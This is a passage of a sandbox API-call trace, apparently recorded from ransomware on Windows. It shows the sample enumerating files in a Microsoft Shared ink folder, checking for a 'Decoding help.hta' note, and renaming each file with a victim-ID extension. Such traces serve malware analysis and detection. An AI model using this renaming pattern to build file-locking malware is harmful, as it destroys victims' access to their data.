ftCreationTime.dwLowDateTime=0x27c9602b, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27c9602b, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa62, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfin.xml", cAlternateFileName="")) returned 1 [0053.074] lstrcpyW (in: lpString1=0x3380118, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.074] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsfin.xml") returned -1 [0053.074] lstrlenW (lpString="ipsfin.xml") returned 10 [0053.074] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsfin.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" [0053.074] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" [0053.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.074] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfin.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfin.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.074] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27cbc188, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27cbc188, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa44, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsfra.xml", cAlternateFileName="")) returned 1 [0053.074] lstrcpyW (in: lpString1=0x3380118, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.074] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.074] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.074] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.074] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsfra.xml") returned -1 [0053.074] lstrlenW (lpString="ipsfra.xml") returned 10 [0053.074] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.075] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.075] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsfra.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" [0053.075] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" [0053.075] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.075] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsfra.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsfra.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.183] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa5c, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipshrv.xml", cAlternateFileName="")) returned 1 [0053.183] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.183] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.183] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.183] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.184] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipshrv.xml") returned -1 [0053.184] lstrlenW (lpString="ipshrv.xml") returned 10 [0053.184] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.184] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.184] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipshrv.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" [0053.184] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" [0053.184] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.184] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipshrv.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipshrv.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.184] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27ce22e5, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27ce22e5, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x91865215, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9de, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsita.xml", cAlternateFileName="")) returned 1 [0053.184] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.184] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.184] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.184] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.184] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsita.xml") returned -1 [0053.184] lstrlenW (lpString="ipsita.xml") returned 10 [0053.184] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.184] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.184] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsita.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" [0053.184] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" [0053.184] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsita.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsita.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.185] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d08442, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d08442, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x9188b373, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x9da, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsjpn.xml", cAlternateFileName="")) returned 1 [0053.185] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.185] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.185] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.185] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsjpn.xml") returned -1 [0053.185] lstrlenW (lpString="ipsjpn.xml") returned 10 [0053.185] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.185] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipsjpn.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" [0053.185] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" [0053.185] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.185] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsjpn.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsjpn.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.185] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa08, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipskor.xml", cAlternateFileName="")) returned 1 [0053.185] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.185] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.185] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.185] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.186] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipskor.xml") returned -1 [0053.186] lstrlenW (lpString="ipskor.xml") returned 10 [0053.186] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.186] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.186] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="ipskor.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" [0053.186] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" [0053.186] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.[ID]g9uZrLhJaygpwRm1[ID]" [0053.186] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipskor.xml.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipskor.xml.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.193] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5dc49d13, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x5dc49d13, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0x2a1fc7a0, ftLastWriteTime.dwHighDateTime=0x1ca0424, nFileSizeHigh=0x0, nFileSizeLow=0xa000, dwReserved0=0x0, dwReserved1=0x0, cFileName="IpsMigrationPlugin.dll", cAlternateFileName="")) returned 1 [0053.193] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.193] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.193] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.193] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.193] lstrcmpiW (lpString1="Decoding help.hta", lpString2="IpsMigrationPlugin.dll") returned -1 [0053.193] lstrlenW (lpString="IpsMigrationPlugin.dll") returned 22 [0053.193] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.193] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.193] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="IpsMigrationPlugin.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll" [0053.193] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll" [0053.194] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll.[ID]g9uZrLhJaygpwRm1[ID]" [0053.194] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsMigrationPlugin.dll.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsmigrationplugin.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0053.194] FindNextFileW (in: hFindFile=0x5db4f8, lpFindFileData=0x141dfd30 | out: lpFindFileData=0x141dfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d2e59f, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d2e59f, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xa42, dwReserved0=0x0, dwReserved1=0x0, cFileName="ipsnld.xml", cAlternateFileName="")) returned 1 [0053.194] lstrcpyW (in: lpString1=0x2517fa60, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" [0053.194] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned 58 [0053.194] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" [0053.194] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\decoding help.hta")) returned 0x1 [0053.194] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ipsnld.xml") returned -1 [0053.194] lstrlenW (lpString="ipsnld.xml") returned 10 [0053.194] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\*.*") returned="\\\\?\\C:\\Program 